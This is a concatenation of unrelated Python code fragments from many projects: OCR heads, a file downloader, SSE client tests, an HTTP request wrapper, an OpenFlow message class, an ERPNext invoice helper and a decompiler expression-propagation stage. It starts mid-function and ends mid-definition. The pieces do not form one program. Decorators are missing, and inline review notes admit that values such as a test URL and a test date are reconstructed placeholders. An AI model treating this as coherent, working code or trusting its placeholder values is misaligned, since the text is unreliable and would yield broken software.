    from .rec_ctc_head import CTCHead
    from .rec_att_head import AttentionHead
    from .rec_srn_head import SRNHead
    from .rec_nrtr_head import Transformer
    from .rec_sar_head import SARHead
    from .rec_aster_head import AsterHead
    from .cls_head import ClsHead
    from .kie_sdmgr_head import SDMGRHead
    from .table_att_head import TableAttentionHead
    # Explicit name -> class registry (same names, same order as before).
    support_dict = {'DBHead': DBHead, 'PSEHead': PSEHead, 'EASTHead': EASTHead, 'SASTHead': SASTHead, 'CTCHead': CTCHead, 'ClsHead': ClsHead, 'AttentionHead': AttentionHead, 'SRNHead': SRNHead, 'PGHead': PGHead, 'Transformer': Transformer, 'TableAttentionHead': TableAttentionHead, 'SARHead': SARHead, 'AsterHead': AsterHead, 'SDMGRHead': SDMGRHead}
    module_name = config.pop('name')
    assert (module_name in support_dict), Exception('head only support {}'.format(list(support_dict)))
    module_class = support_dict[module_name](**config)
    return module_class
def download_file(url, dstpath, download_even_if_exists=False, filename_prefix='', silent=False):
    """Download `url` into `dstpath` with progress output; return the local path.

    Skips the download when the target already exists (unless
    `download_even_if_exists`). Returns None on failure, removing any
    partially written file; Ctrl-C aborts the whole program.

    Fix: the except-branch SSL check contained a corrupted (unterminated)
    string literal; restored to the upstream check for https URLs on
    Pythons built without SSL support.
    """
    debug_print((((('download_file(url=' + url) + ', dstpath=') + dstpath) + ')'))
    file_name = get_download_target(url, dstpath, filename_prefix)
    if (os.path.exists(file_name) and (not download_even_if_exists)):
        print((("File '" + file_name) + "' already downloaded, skipping."))
        return file_name
    try:
        u = urlopen(url)
        mkdir_p(os.path.dirname(file_name))
        with open(file_name, 'wb') as f:
            file_size = get_content_length(u)
            if (file_size > 0):
                print(('Downloading: %s from %s, %s Bytes' % (file_name, url, file_size)))
            else:
                print(('Downloading: %s from %s' % (file_name, url)))
            file_size_dl = 0
            # Non-TTY progress: a fixed-width bar of '-' characters.
            progress_max = (80 - 4)
            progress_shown = 0
            block_sz = (256 * 1024)
            if (not TTY_OUTPUT):
                print(' [', end='')
            while True:
                buffer = u.read(block_sz)
                if (not buffer):
                    break
                file_size_dl += len(buffer)
                f.write(buffer)
                if file_size:
                    percent = ((file_size_dl * 100.0) / file_size)
                    if TTY_OUTPUT:
                        # In-place status line, overwritten via carriage return.
                        status = (' %10d [%3.02f%%]' % (file_size_dl, percent))
                        print(status, end='\r')
                    else:
                        while (progress_shown < ((progress_max * percent) / 100)):
                            print('-', end='')
                            sys.stdout.flush()
                            progress_shown += 1
            if (not TTY_OUTPUT):
                print(']')
                sys.stdout.flush()
    except Exception as e:
        if (not silent):
            errlog(((("Error: Downloading URL '" + url) + "': ") + str(e)))
            # FIX: restored corrupted literal below (was unterminated).
            if (('SSL: CERTIFICATE_VERIFY_FAILED' in str(e)) or ('urlopen error unknown url type: https' in str(e))):
                errlog('Warning: Possibly SSL/TLS issue. Update or install Python SSL root certificates (2048-bit or greater) supplied in Python folder or and try again.')
        rmfile(file_name)
        return None
    except KeyboardInterrupt:
        rmfile(file_name)
        exit_with_error('aborted by user, exiting')
    return file_name
class TestSSEClient():
    """Tests for _sseclient.SSEClient against a mocked requests adapter."""

    # FIX: this literal was corrupted (unterminated string) in this copy of
    # the file; restored to a placeholder endpoint. NOTE(review): confirm
    # the exact URL against the repository history.
    test_url = 'https://test.firebaseio.com'

    def init_sse(self, payload, recorder=None):
        """Build an SSEClient whose transport replays `payload`.

        Requests issued by the client are appended to `recorder`.
        """
        if (recorder is None):
            recorder = []
        adapter = MockSSEClientAdapter(payload, recorder)
        session = requests.Session()
        session.mount(self.test_url, adapter)
        return _sseclient.SSEClient(url=self.test_url, session=session, retry=1)

    def test_init_sseclient(self):
        payload = 'event: put\ndata: {"path":"/","data":"testevent"}\n\n'
        sseclient = self.init_sse(payload)
        assert (sseclient.url == self.test_url)
        assert (sseclient.session is not None)

    def test_single_event(self):
        # After the stream is exhausted the client reconnects, so the second
        # next() issues a second request (recorder grows to 2).
        payload = 'event: put\ndata: {"path":"/","data":"testevent"}\n\n'
        recorder = []
        sseclient = self.init_sse(payload, recorder)
        event = next(sseclient)
        event_payload = json.loads(event.data)
        assert (event_payload['data'] == 'testevent')
        assert (event_payload['path'] == '/')
        assert (len(recorder) == 1)
        event = next(sseclient)
        event_payload = json.loads(event.data)
        assert (event_payload['data'] == 'testevent')
        assert (event_payload['path'] == '/')
        assert (len(recorder) == 2)

    def test_large_event(self):
        # ~0.1 MiB payload exercises parsing of a single large event.
        data = ('a' * int(((0.1 * 1024) * 1024)))
        payload = (('event: put\ndata: {"path":"/","data":"' + data) + '"}\n\n')
        recorder = []
        sseclient = self.init_sse(payload, recorder)
        event = next(sseclient)
        event_payload = json.loads(event.data)
        assert (event_payload['data'] == data)
        assert (event_payload['path'] == '/')
        assert (len(recorder) == 1)

    def test_multiple_events(self):
        payload = 'event: put\ndata: {"path":"/foo","data":"testevent1"}\n\n'
        payload += 'event: put\ndata: {"path":"/bar","data":"testevent2"}\n\n'
        recorder = []
        sseclient = self.init_sse(payload, recorder)
        event = next(sseclient)
        event_payload = json.loads(event.data)
        assert (event_payload['data'] == 'testevent1')
        assert (event_payload['path'] == '/foo')
        event = next(sseclient)
        event_payload = json.loads(event.data)
        assert (event_payload['data'] == 'testevent2')
        assert (event_payload['path'] == '/bar')
        assert (len(recorder) == 1)

    def test_event_separators(self):
        # SSE permits \n\n, \r\r, and \r\n\r\n as event separators.
        payload = 'event: put\ndata: {"path":"/foo","data":"testevent1"}\n\n'
        payload += 'event: put\ndata: {"path":"/bar","data":"testevent2"}\r\r'
        payload += 'event: put\ndata: {"path":"/baz","data":"testevent3"}\r\n\r\n'
        recorder = []
        sseclient = self.init_sse(payload, recorder)
        event = next(sseclient)
        event_payload = json.loads(event.data)
        assert (event_payload['data'] == 'testevent1')
        assert (event_payload['path'] == '/foo')
        event = next(sseclient)
        event_payload = json.loads(event.data)
        assert (event_payload['data'] == 'testevent2')
        assert (event_payload['path'] == '/bar')
        event = next(sseclient)
        event_payload = json.loads(event.data)
        assert (event_payload['data'] == 'testevent3')
        assert (event_payload['path'] == '/baz')
        assert (len(recorder) == 1)
def request(method: str, url: URLTypes, *, params: typing.Optional[QueryParamTypes]=None, content: typing.Optional[RequestContent]=None, data: typing.Optional[RequestData]=None, files: typing.Optional[RequestFiles]=None, json: typing.Optional[typing.Any]=None, headers: typing.Optional[HeaderTypes]=None, cookies: typing.Optional[CookieTypes]=None, auth: typing.Optional[AuthTypes]=None, proxy: typing.Optional[ProxyTypes]=None, proxies: typing.Optional[ProxiesTypes]=None, timeout: TimeoutTypes=DEFAULT_TIMEOUT_CONFIG, follow_redirects: bool=False, verify: VerifyTypes=True, cert: typing.Optional[CertTypes]=None, trust_env: bool=True) -> Response:
    """Send a single HTTP request through a throw-away Client.

    Connection-level options configure the temporary client; request-level
    options are forwarded to Client.request(). The client is closed when
    the request completes.
    """
    client = Client(cookies=cookies, proxy=proxy, proxies=proxies, cert=cert, verify=verify, timeout=timeout, trust_env=trust_env)
    with client:
        return client.request(method=method, url=url, content=content, data=data, files=files, json=json, params=params, headers=headers, auth=auth, follow_redirects=follow_redirects)
def test_changing_case(qtbot, notifier, storage):
    """Two CaseSelector widgets stay in sync with the notifier's current case.

    Changing the case programmatically updates both widgets; selecting a
    case via keyboard in one widget updates the notifier and the sibling.
    """
    ensemble_a = storage.create_experiment().create_ensemble(name='default_a', ensemble_size=1)
    ensemble_b = storage.create_experiment().create_ensemble(name='default_b', ensemble_size=1)
    notifier.set_storage(storage)
    notifier.set_current_case(ensemble_a)
    widget_a = CaseSelector(notifier)
    widget_b = CaseSelector(notifier)
    qtbot.addWidget(widget_a)
    qtbot.addWidget(widget_b)
    # Both ensembles are listed, and the current one is selected everywhere.
    assert (widget_a.count() == 2)
    assert (widget_b.count() == 2)
    assert (widget_a.currentData() == ensemble_a)
    assert (widget_b.currentData() == ensemble_a)
    # Programmatic change propagates to both widgets.
    notifier.set_current_case(ensemble_b)
    assert (widget_a.currentData() == ensemble_b)
    assert (widget_b.currentData() == ensemble_b)
    # Simulate the user typing ensemble_a's label into widget_a.
    qtbot.keyClicks(widget_a, widget_a.itemText(widget_a.findData(ensemble_a)))
    assert (notifier.current_case == ensemble_a)
    assert (widget_a.currentData() == ensemble_a)
    assert (widget_b.currentData() == ensemble_a)
class Lab(base.CIELab):
    """CSS `lab()` color class: CSS serialization and parsing for CIE Lab."""

    def to_string(self, parent: Color, *, alpha: (bool | None)=None, precision: (int | None)=None, fit: ((bool | str) | dict[(str, Any)])=True, none: bool=False, color: bool=False, percent: (bool | Sequence[bool])=False, **kwargs: Any) -> str:
        """Serialize the color as a CSS `lab(...)` function string."""
        return serialize.serialize_css(parent, func='lab', alpha=alpha, precision=precision, fit=fit, none=none, color=color, percent=percent)

    def match(self, string: str, start: int=0, fullmatch: bool=True) -> (tuple[(tuple[(Vector, float)], int)] | None):
        """Parse a CSS lab() string; returns (channels + alpha, end index) or None."""
        return parse.parse_css(self, string, start, fullmatch)
class OptionPlotoptionsBarStates(Options):
    """Accessors for bar-series `states` sub-options (hover/inactive/normal/select)."""

    def hover(self) -> 'OptionPlotoptionsBarStatesHover':
        # Lazily creates and returns the nested `hover` option object.
        return self._config_sub_data('hover', OptionPlotoptionsBarStatesHover)

    def inactive(self) -> 'OptionPlotoptionsBarStatesInactive':
        return self._config_sub_data('inactive', OptionPlotoptionsBarStatesInactive)

    def normal(self) -> 'OptionPlotoptionsBarStatesNormal':
        return self._config_sub_data('normal', OptionPlotoptionsBarStatesNormal)

    def select(self) -> 'OptionPlotoptionsBarStatesSelect':
        return self._config_sub_data('select', OptionPlotoptionsBarStatesSelect)
@pytest.mark.order(-1)
@pytest.mark.parametrize(('username', 'path', 'slug', 'status'), (('tessdoe', 'tess-title-blog-3', 'tell-title-blog-3', 204), ('tessdoe', 'tell-title-blog-10000', 'tell-title-blog-3', 404), ('leodoe', 'tess-title-blog-2', 'tell-title-blog-2', 403)))
def test_delete_post(username, path, slug, status):
    """DELETE /posts/<path> as `username` and expect the given HTTP status.

    Cases: owner deletes own post (204), missing post (404), another
    user's post (403). NOTE(review): the '@pytest.mark' decorator prefixes
    were reconstructed (the lines had degraded to '.order(...)' and
    '.parametrize(...)'); confirm against the repository.
    """
    headers = {}
    # Mint a short-lived JWT for the acting user.
    req_time = timedelta(minutes=30)
    data = {'sub': username}
    token_data = create_access_token(data=data, expires_delta=req_time)
    headers['Authorization'] = ('Bearer ' + token_data)
    response = client.delete(('/posts/' + path), headers=headers)
    assert (status == response.status_code)
def extractFirsttrytranslationsWordpressCom(item):
    """Build a release message for firsttrytranslations.wordpress.com feed items.

    Returns None for previews/unnumbered items, a release message for a
    recognized tag, and False when no tag matches.
    """
    vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
    is_preview = 'preview' in item['title'].lower()
    has_numbering = bool(chp or vol)
    if is_preview or not has_numbering:
        return None
    for tagname, name, tl_type in (('PRC', 'PRC', 'translated'), ('Loiterous', 'Loiterous', 'oel')):
        if tagname in item['tags']:
            return buildReleaseMessageWithType(item, name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type)
    return False
def test_summary_collector(monkeypatch, snake_oil_case_storage, snake_oil_default_storage, snapshot):
    """load_all_summary_data: full frame, key filtering, and realization slicing."""
    # Pin the timezone so the snapshot CSVs are byte-stable across machines.
    monkeypatch.setenv('TZ', 'CET')
    data = snake_oil_default_storage.load_all_summary_data()
    snapshot.assert_match(data.iloc[:4].round(4).to_csv(), 'summary_collector_1.csv')
    assert (data.shape == (1000, 44))
    with pytest.raises(KeyError):
        # Realization 60 is not part of this case.
        _ = data.loc[60]
    # Filtering to two keys narrows the columns accordingly.
    data = snake_oil_default_storage.load_all_summary_data(['WWCT:OP1', 'WWCT:OP2'])
    snapshot.assert_match(data.iloc[:4].to_csv(), 'summary_collector_2.csv')
    assert (data.shape == (1000, 2))
    with pytest.raises(KeyError):
        # Keys outside the filter must not be present.
        _ = data['FOPR']
    # A single realization returns only that realization's rows.
    realization_index = 4
    data = snake_oil_default_storage.load_all_summary_data(['WWCT:OP1', 'WWCT:OP2'], realization_index=realization_index)
    snapshot.assert_match(data.iloc[:4].to_csv(), 'summary_collector_3.csv')
    assert (data.shape == (200, 2))
    # Out-of-range realization indices raise IndexError.
    non_existing_realization_index = 150
    with pytest.raises(IndexError):
        _ = snake_oil_default_storage.load_all_summary_data(['WWCT:OP1', 'WWCT:OP2'], realization_index=non_existing_realization_index)
def test_dualperm_fractured_soil_property(dual_poro_dual_perm_run):
    """Fracture-system SOIL read from restart should be ~0 in the sampled cells.

    FIX: the `date=` argument was corrupted in this copy of the file (it
    read `date=,`, a syntax error). NOTE(review): the value below is a
    placeholder -- the original date must be recovered from the repository
    history before relying on this test.
    """
    import datetime
    soil = dual_poro_dual_perm_run.get_property_from_restart('SOIL', date=datetime.date(2000, 1, 1), fracture=True)
    assert (soil.values[(3, 0, 0)] == pytest.approx(0.0))
    assert (soil.values[(0, 1, 0)] == pytest.approx(0.0))
    assert (soil.values[(3, 2, 0)] == pytest.approx(0.0))
class port_status(message):
    """OpenFlow wire-version 4 OFPT_PORT_STATUS message (type 12).

    Announces that a port was added, deleted, or modified; `desc` carries
    the full port description.
    """
    version = 4
    type = 12

    def __init__(self, xid=None, reason=None, desc=None):
        if (xid != None):
            self.xid = xid
        else:
            self.xid = None
        if (reason != None):
            self.reason = reason
        else:
            self.reason = 0
        if (desc != None):
            self.desc = desc
        else:
            self.desc = ofp.port_desc()
        return

    def pack(self):
        """Serialize to wire format; the length field is back-patched last."""
        packed = []
        packed.append(struct.pack('!B', self.version))
        packed.append(struct.pack('!B', self.type))
        packed.append(struct.pack('!H', 0))  # length placeholder, patched below
        packed.append(struct.pack('!L', self.xid))
        packed.append(struct.pack('!B', self.reason))
        packed.append(('\x00' * 7))  # pad before the port description
        packed.append(self.desc.pack())
        length = sum([len(x) for x in packed])
        packed[2] = struct.pack('!H', length)
        return ''.join(packed)

    def unpack(reader):
        # NOTE(review): no `self`/`cls` parameter -- generated bindings
        # normally mark this @staticmethod; confirm the decorator wasn't lost.
        obj = port_status()
        _version = reader.read('!B')[0]
        assert (_version == 4)
        _type = reader.read('!B')[0]
        assert (_type == 12)
        _length = reader.read('!H')[0]
        orig_reader = reader
        reader = orig_reader.slice(_length, 4)  # bound reads to this message
        obj.xid = reader.read('!L')[0]
        obj.reason = reader.read('!B')[0]
        reader.skip(7)  # padding
        obj.desc = ofp.port_desc.unpack(reader)
        return obj

    def __eq__(self, other):
        if (type(self) != type(other)):
            return False
        if (self.xid != other.xid):
            return False
        if (self.reason != other.reason):
            return False
        if (self.desc != other.desc):
            return False
        return True

    def pretty_print(self, q):
        """Render a human-readable dump onto pretty-printer `q`."""
        q.text('port_status {')
        with q.group():
            with q.indent(2):
                q.breakable()
                q.text('xid = ')
                if (self.xid != None):
                    q.text(('%#x' % self.xid))
                else:
                    q.text('None')
                q.text(',')
                q.breakable()
                q.text('reason = ')
                # Show the symbolic OFPPR_* name when the value is known.
                value_name_map = {0: 'OFPPR_ADD', 1: 'OFPPR_DELETE', 2: 'OFPPR_MODIFY'}
                if (self.reason in value_name_map):
                    q.text(('%s(%d)' % (value_name_map[self.reason], self.reason)))
                else:
                    q.text(('%#x' % self.reason))
                q.text(',')
                q.breakable()
                q.text('desc = ')
                q.pp(self.desc)
            q.breakable()
        q.text('}')
class AttachableTests(unittest.TestCase):
    """Unit tests for the Attachable QBO object."""

    def test_unicode(self):
        """str() of an Attachable is its FileName."""
        obj = Attachable()
        obj.FileName = 'test'
        self.assertEqual(str(obj), 'test')

    def test_to_ref(self):
        """to_ref() carries over the name, type, and Id of the source object."""
        obj = Attachable()
        obj.FileName = 'test'
        obj.Id = 12
        reference = obj.to_ref()
        self.assertEqual(reference.name, 'test')
        self.assertEqual(reference.type, 'Attachable')
        self.assertEqual(reference.value, 12)

    def test_valid_object_name(self):
        """The QBO object name must be recognized by the client."""
        obj = Attachable()
        qb_client = QuickBooks()
        self.assertTrue(qb_client.isvalid_object_name(obj.qbo_object_name))
_renderer(wrap_type=TestCategoryCount)
_renderer(wrap_type=TestCategoryShare)
# NOTE(review): the two lines above look like class decorators (e.g.
# '@default_renderer(wrap_type=...)') whose prefix was lost during
# extraction -- confirm against the repository.
class TestCategoryRenderer(TestRenderer):
    """HTML renderer for TestCategoryCount / TestCategoryShare results."""

    def _get_number_and_percents(s: pd.Series, num: int) -> pd.DataFrame:
        # NOTE(review): no `self` parameter, yet called as
        # self._get_number_and_percents(...) below -- presumably
        # @staticmethod in the original source; confirm.
        # Formats each count as "count (pp.pp%)" relative to `num`.
        return (((s.astype(str) + ' (') + ((s / num) * 100).round(2).astype(str)) + '%)')

    def get_value_counts_table_with_percents(self, info: TestHtmlInfo, curr_df: pd.DataFrame, ref_df: Optional[pd.DataFrame], n_curr: int, n_ref: Optional[int], name: str) -> TestHtmlInfo:
        """Attach a value-counts table (current vs optional reference) to `info`."""
        curr_df = curr_df.copy()
        replace = [('current value counts', n_curr)]
        if ((ref_df is not None) and (n_ref is not None)):
            ref_df = ref_df.copy()
            replace.append(('reference value counts', n_ref))
            # Align current and reference counts on the category value ('x').
            df = curr_df.merge(ref_df, on='x', how='outer')
            df.columns = ['value', 'current value counts', 'reference value counts']
            df[['current value counts', 'reference value counts']] = df[['current value counts', 'reference value counts']].fillna(0.0)
            df.sort_values(['current value counts', 'reference value counts'], ascending=False, inplace=True)
        else:
            df = curr_df
            df.columns = ['value', 'current value counts']
            df.sort_values('current value counts', ascending=False, inplace=True)
        # Rewrite count columns as "count (percent%)" strings.
        for (col, n) in replace:
            df[col] = self._get_number_and_percents(df[col].fillna(0), n)
        info.details = [DetailsInfo(id=name, title='', info=BaseWidgetInfo(title='', type='table', params={'header': list(df.columns), 'data': df.values}, size=2))]
        return info

    def render_html(self, obj: Union[(TestCategoryCount, TestCategoryShare)]) -> TestHtmlInfo:
        """Render the base test HTML plus the per-category counts table."""
        info = super().render_html(obj)
        column_name = obj.column_name.display_name
        counts_data = obj.metric.get_result().counts_of_values
        curr_df = counts_data['current']
        ref_df = None
        if ('reference' in counts_data.keys()):
            ref_df = counts_data['reference']
        n_curr = obj.metric.get_result().current.all_num
        ref = obj.metric.get_result().reference
        n_ref = None
        if (ref is not None):
            n_ref = ref.all_num
        return self.get_value_counts_table_with_percents(info, curr_df, ref_df, n_curr, n_ref, f'cat_counts_{column_name}')
()
# NOTE(review): the line above looks like a bare decorator call (e.g.
# '@frappe.whitelist()') whose name was lost during extraction -- confirm
# against the repository.
def make_sales_invoice(reference_name, patient, company, therapy_plan_template):
    """Draft (unsaved) Sales Invoice for a Therapy Plan's linked item.

    Prices the single line via the first selling Price List and links the
    line back to the Therapy Plan through reference_dt/reference_dn.
    """
    from erpnext.stock.get_item_details import get_item_details
    si = frappe.new_doc('Sales Invoice')
    si.company = company
    si.patient = patient
    si.customer = frappe.db.get_value('Patient', patient, 'customer')
    item = frappe.db.get_value('Therapy Plan Template', therapy_plan_template, 'linked_item')
    # The first selling price list found supplies the rate and currency.
    (price_list, price_list_currency) = frappe.db.get_values('Price List', {'selling': 1}, ['name', 'currency'])[0]
    args = {'doctype': 'Sales Invoice', 'item_code': item, 'company': company, 'customer': si.customer, 'selling_price_list': price_list, 'price_list_currency': price_list_currency, 'plc_conversion_rate': 1.0, 'conversion_rate': 1.0}
    item_line = si.append('items', {})
    item_details = get_item_details(args)
    item_line.item_code = item
    item_line.qty = 1
    item_line.rate = item_details.price_list_rate
    item_line.amount = (flt(item_line.rate) * flt(item_line.qty))
    item_line.reference_dt = 'Therapy Plan'
    item_line.reference_dn = reference_name
    item_line.description = item_details.description
    si.set_missing_values(for_validate=True)
    return si
def dump_github() -> str:
    """Render a textual summary of all PRs plus the stacked-branch repo state.

    Queries the pytorch/pytorch pull-request list over GraphQL, shows the
    commit graph for open PRs (omitted for closed ones), then appends a
    `git log --graph` of the gh/*/*/next and gh/*/*/head bookkeeping
    branches. The whole result is indented for embedding in expected-test
    output.
    """
    # CTX is a module-level test context supplying the github client and repo shell.
    self = CTX
    r = self.github.graphql('\n    query {\n      repository(name: "pytorch", owner: "pytorch") {\n        pullRequests {\n          nodes {\n            number\n            baseRefName\n            headRefName\n            title\n            body\n            closed\n          }\n        }\n      }\n    }\n    ')
    prs = []
    for pr in r['data']['repository']['pullRequests']['nodes']:
        # Normalize line endings and indent the body under the PR header.
        pr['body'] = indent(pr['body'].replace('\r', ''), '    ')
        if (not pr['closed']):
            pr['commits'] = self.upstream_sh.git('log', '--graph', '--oneline', '--pretty=format:%h %s', f"{pr['baseRefName']}..{pr['headRefName']}")
            pr['commits'] = indent(strip_trailing_whitespace(pr['commits']), '    ')
        else:
            pr['commits'] = '    (omitted)'
        pr['status'] = ('[X]' if pr['closed'] else '[O]')
        prs.append('{status} #{number} {title} ({headRefName} -> {baseRefName})\n\n{body}\n\n{commits}\n\n'.format(**pr))
    refs = self.upstream_sh.git('log', '--graph', '--oneline', '--branches=gh/*/*/next', '--branches=gh/*/*/head', '--pretty=format:%h%d%n%w(0,3,3)%s')
    prs.append((('Repository state:\n\n' + indent(strip_trailing_whitespace(refs), '    ')) + '\n'))
    return (indent(''.join(prs), (' ' * 8)) + (' ' * 8))
class ExpressionPropagationBase(PipelineStage, ABC):
    """Pipeline stage that propagates definitions (``x = expr``) into uses of ``x``.

    Subclasses decide which definitions may be substituted into a given target
    instruction via ``_definition_can_be_propagated_into_target``.

    NOTE(review): several helpers below (``_find_subexpressions`` through
    ``_is_variable_contraction``) take no ``self`` yet are invoked as
    ``self._...`` — their ``@staticmethod`` decorators were apparently lost in
    extraction; confirm against the original source.
    """
    name = 'expression-propagation-base'

    def __init__(self):
        # Use/def maps over the current CFG; rebuilt on every perform() pass.
        self._use_map: UseMap
        self._def_map: DefMap
        self._pointers_info: Optional[Pointers] = None
        # str(instruction) -> {(basic_block, index), ...}: all occurrences of
        # a textually identical instruction in the CFG.
        self._blocks_map: Optional[DefaultDict[(str, Set)]] = None
        self._cfg: Optional[ControlFlowGraph] = None
        # Aliased variables whose propagation a subclass chose to postpone.
        self._postponed_aliased: Set[Variable] = set()

    def run(self, task: DecompilerTask):
        """Repeat propagation passes over the task's graph until a fixpoint."""
        iteration = 0
        while self.perform(task.graph, iteration):
            iteration += 1
        logging.info(f'{self.name} took {iteration} iterations')

    def perform(self, graph, iteration) -> bool:
        """Run one propagation pass over *graph*; return True if anything changed."""
        is_changed = False
        self._cfg = graph
        self._initialize_maps(graph)
        for basic_block in graph.nodes:
            for (index, instruction) in enumerate(basic_block.instructions):
                # Compare textual form before/after to detect a change.
                old = str(instruction)
                self._try_to_propagate_contractions(instruction)
                for var in instruction.requirements:
                    if (var_definition := self._def_map.get(var)):
                        if self._definition_can_be_propagated_into_target(var_definition, instruction):
                            instruction.substitute(var, var_definition.value.copy())
                            self._update_block_map(old, str(instruction), basic_block, index)
                            self._update_use_map(var, instruction)
                if (not is_changed):
                    is_changed = (old != str(instruction))
        return is_changed

    def _definition_can_be_propagated_into_target(self, definition: Assignment, target: Instruction) -> bool:
        """Subclass hook: decide whether *definition* may be substituted into
        *target*.  (Body absent here — presumably abstract; confirm.)"""
        pass

    def _initialize_maps(self, cfg: ControlFlowGraph) -> None:
        """Build def-map, use-map and the instruction-occurrence map for *cfg*."""
        self._def_map = DefMap()
        self._use_map = UseMap()
        self._blocks_map = defaultdict(set)
        for basic_block in cfg.nodes:
            for (index, instruction) in enumerate(basic_block.instructions):
                self._blocks_map[str(instruction)].add((basic_block, index))
                self._use_map.add(instruction)
                self._def_map.add(instruction)

    def _update_block_map(self, old_instr_str: str, new_instr_str: str, basic_block: BasicBlock, index: int):
        """Hook: keep _blocks_map in sync after a substitution (no-op here)."""
        pass

    def _update_use_map(self, variable: Variable, instruction: Instruction):
        """Hook: keep _use_map in sync after a substitution (no-op here)."""
        pass

    def _propagate_postponed_aliased_definitions(self):
        """Hook: process variables collected in _postponed_aliased (no-op here)."""
        pass

    def _try_to_propagate_contractions(self, instruction: Instruction):
        """Substitute contraction subexpressions (truncating casts of a variable)
        with the value of a matching contraction definition."""
        # For assignments only the right-hand side is searched.
        target = (instruction if (not isinstance(instruction, Assignment)) else instruction.value)
        for subexpr in self._find_subexpressions(target):
            if self._is_variable_contraction(subexpr):
                if (definition := self._def_map.get(subexpr.operand)):
                    # Never pull an address-of assignment into a contraction.
                    if (isinstance(definition, Assignment) and self._is_address_assignment(definition)):
                        continue
                    (defined_contraction, value) = (definition.destination, definition.value)
                    if (subexpr == defined_contraction):
                        instruction.substitute(subexpr, value.copy())

    def _is_aliased_postponed_for_propagation(self, target: Instruction, definition: Assignment) -> bool:
        """True (and record the variable) when *definition* writes an aliased
        variable that *target* redefines — propagation must wait."""
        if self._is_aliased_variable((aliased := definition.destination)):
            if self._is_aliased_redefinition(aliased, target):
                self._postponed_aliased.add(aliased)
                return True
        return False

    def _is_invalid_propagation_into_address_operation(self, target: Instruction, definition: Assignment) -> bool:
        """True when *target* takes the address of something that *definition*
        defines — substituting would change what the address refers to."""
        if isinstance(target, Assignment):
            subexpressions = list(self._find_subexpressions(target.destination))
            subexpressions.extend((expr for expr in self._find_subexpressions(target.value)))
            return any(((self._is_address(expr) and (expr.operand in self._find_subexpressions(definition.destination))) for expr in subexpressions))
        elif isinstance(target, Return):
            subexpressions = list(self._find_subexpressions(target))
            return any(((self._is_address(expr) and (expr.operand in self._find_subexpressions(definition.destination))) for expr in subexpressions))
        return False

    def _operation_is_propagated_in_phi(self, target: Instruction, definition: Assignment) -> bool:
        # Phi arguments must stay plain variables; operations may not enter a Phi.
        return (isinstance(target, Phi) and isinstance(definition.value, Operation))

    def _is_address_assignment(self, definition: Assignment) -> bool:
        # Matches definitions of the form: x = &y
        return self._is_address(definition.value)

    def _is_dereference_assignment(self, definition: Assignment) -> bool:
        # True when the right-hand side contains a *ptr anywhere.
        return any([self._is_dereference(x) for x in self._find_subexpressions(definition.value)])

    def _is_address_into_dereference(self, definition: Assignment, target: Instruction) -> bool:
        """True when definition is ``x = &y`` and *target* dereferences ``x``.

        NOTE(review): no explicit ``return False`` at the end — the no-match
        path returns None (falsy); confirm this is intentional.
        """
        if self._is_address(definition.value):
            for subexpr in target:
                for sub in self._find_subexpressions(subexpr):
                    if (self._is_dereference(sub) and (sub.operand == definition.destination)):
                        return True

    def _contains_aliased_variables(self, definition: Assignment) -> bool:
        """True when any subexpression of *definition* is an aliased variable."""
        return any([self._is_aliased_variable(expr) for expr in self._find_subexpressions(definition)])

    def _pointer_value_used_in_definition_could_be_modified_via_memory_access_between_definition_and_target(self, definition: Assignment, target: Instruction) -> bool:
        """True when a pointer dereferenced in *definition* could be written
        through between *definition* and *target*.

        NOTE(review): returns after examining the first tracked pointer variable
        found — later pointers in the same definition are not checked; confirm
        this early return is intended.
        """
        for subexpr in self._find_subexpressions(definition.value):
            if self._is_dereference(subexpr):
                for variable in subexpr.requirements:
                    if (variable in self._pointers_info.points_to):
                        dangerous_uses = self._get_dangerous_uses_of_pointer(variable)
                        return self._has_any_of_dangerous_uses_between_definition_and_target(definition, target, dangerous_uses)
        return False

    def _definition_value_could_be_modified_via_memory_access_between_definition_and_target(self, definition: Assignment, target: Instruction) -> bool:
        """True when an aliased variable in *definition* could be modified via
        its address or a pointer to it on some path between the two points."""
        for aliased_variable in set(self._iter_aliased_variables(definition)):
            dangerous_address_uses = self._get_dangerous_uses_of_variable_address(aliased_variable)
            dangerous_pointer_uses = self._get_dangerous_uses_of_pointer_to_variable(aliased_variable)
            if (dangerous_address_uses or dangerous_pointer_uses):
                dangerous_uses = dangerous_pointer_uses.union(dangerous_address_uses)
                if self._has_any_of_dangerous_uses_between_definition_and_target(definition, target, dangerous_uses):
                    return True
        return False

    def _has_any_of_dangerous_uses_between_definition_and_target(self, definition: Assignment, target: Instruction, dangerous_uses: Set[Instruction]) -> bool:
        """True when any of *dangerous_uses* lies on a path from *definition* to
        *target* (same-block range check, or CFG reachability across blocks).

        Raises RuntimeError when the definition occurs in zero or in multiple
        blocks — both violate SSA-style uniqueness assumed here.
        """
        definition_block_info = self._blocks_map[str(definition)]
        if (len(definition_block_info) == 0):
            raise RuntimeError(f'No blocks found for definition {definition}')
        if (len(definition_block_info) > 1):
            raise RuntimeError(f'Same definition {definition} in multiple blocks')
        (definition_block, definition_index) = list(definition_block_info)[0]
        for (target_block, target_index) in self._blocks_map[str(target)]:
            if (target_block == definition_block):
                # Same block: a dangerous use strictly between the two indices.
                for use in dangerous_uses:
                    if (use in definition_block.instructions[definition_index:target_index]):
                        return True
            else:
                for use in dangerous_uses:
                    for (use_block, use_index) in self._blocks_map[str(use)]:
                        if (use_block == target_block):
                            if (use_index < target_index):
                                return True
                        elif (use_block == definition_block):
                            if (use_index > definition_index):
                                return True
                        elif (self._cfg.has_path(definition_block, use_block) and self._cfg.has_path(use_block, target_block)):
                            return True
        return False

    def _get_dangerous_uses_of_variable_address(self, var: Variable) -> Set[Instruction]:
        """Call-assignments that take &var — the callee may write through it."""
        dangerous_uses = set()
        for use in self._use_map.get(var):
            if (not self._is_call_assignment(use)):
                continue
            for subexpr in self._find_subexpressions(use):
                if self._is_address(subexpr):
                    dangerous_uses.add(use)
                    break
        return dangerous_uses

    def _get_dangerous_uses_of_pointer_to_variable(self, var: Variable) -> Set[Instruction]:
        """Dangerous uses of every pointer known to point at *var*."""
        is_pointed_by = self._pointers_info.is_pointed_by.get(var.name, set())
        dangerous_uses = set()
        for pointer in is_pointed_by:
            dangerous_uses.update(self._get_dangerous_uses_of_pointer(pointer))
        return dangerous_uses

    def _get_dangerous_uses_of_pointer(self, pointer: Variable) -> Set[Instruction]:
